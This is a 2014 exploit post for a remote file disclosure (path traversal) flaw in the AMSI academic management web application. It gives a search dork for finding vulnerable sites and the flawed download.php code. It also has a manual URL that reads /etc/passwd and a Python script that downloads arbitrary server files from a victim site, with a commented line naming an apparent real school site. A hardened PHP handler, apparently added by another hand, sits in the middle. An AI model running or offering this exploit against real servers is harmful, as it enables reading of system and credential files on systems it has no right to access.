Tuesday, 23 December 2014

AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage :  http://h4x0resec.blogspot.com
[~] Good People :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software  : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork :  inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
The flaw makes it possible to read any file from the server's local filesystem.
 #######################################################
 
### Vulnerable lines in 'download.php' ## 
 
..
    $path   =   str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
    // $path = $_GET['file']; 
    header("Content-Description: File Transfer");
    header("Content-Type: application/force-download");
    //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
    header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );

    @readfile($path);
..
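
A hardened form of the handler above, as an added example that is not AMSI's own code or a vendor patch: it resolves the requested name with realpath() and serves the file only if the result stays inside one fixed directory. DOWNLOAD_ROOT, its path and the function name resolve_download() are assumptions made for illustration.

```php
<?php
// Added example (not AMSI code): hardened replacement for the handler above.
// DOWNLOAD_ROOT and resolve_download() are assumed names for illustration.

const DOWNLOAD_ROOT = '/var/www/amsi/files'; // assumed: the only directory served

// Map a user-supplied name to a regular file inside $root, or return null.
function resolve_download(string $root, string $requested): ?string
{
    // Empty names and NUL bytes are never valid file names.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; false if nothing exists there.
    $full = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // The resolved path must still sit under the root. The trailing separator
    // keeps a sibling such as "/var/www/amsi/files-old" from matching.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Read the parameter PHP has already decoded instead of slicing REQUEST_URI.
$requested = (isset($_GET['file']) && is_string($_GET['file'])) ? $_GET['file'] : '';
$path = resolve_download(DOWNLOAD_ROOT, $requested);
if ($path === null) {
    http_response_code(404); // same answer for "missing" and "outside the root"
    exit;
}

// Build the header from the resolved name, restricted to a safe character set.
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

With this check in place, a value such as ../../../../etc/passwd resolves outside DOWNLOAD_ROOT and the handler answers 404 without opening the file.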
########################################################
Example and tested on;
 
 
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################

# Coded by b3mb4m 
 
import random
import os
import urllib

class B3mB4m(object):
 def example(self):
  print """

  How to use ? 
   Website:  http://VICTIM.com
   Path : /download.php?file=../../../../etc/passwd
  """ 
  
 def exploit(self):
  ask = raw_input("Website :")
  uz = raw_input("Path : ")

  #ask = "http://alnashaa.sch.ae"
  #uz = "/download.php?file=../../../../etc/passwd"

  uniq = str(random.randrange(1,1000+1))+".txt"
  filee = ask+uz

  try:
   urllib.urlretrieve(filee, uniq); 
   print "\t\nDownload complete ! "
   os.startfile(uniq)
  except:
   B3mB4m().example() 


if __name__ == '__main__':
 B3mB4m().exploit()
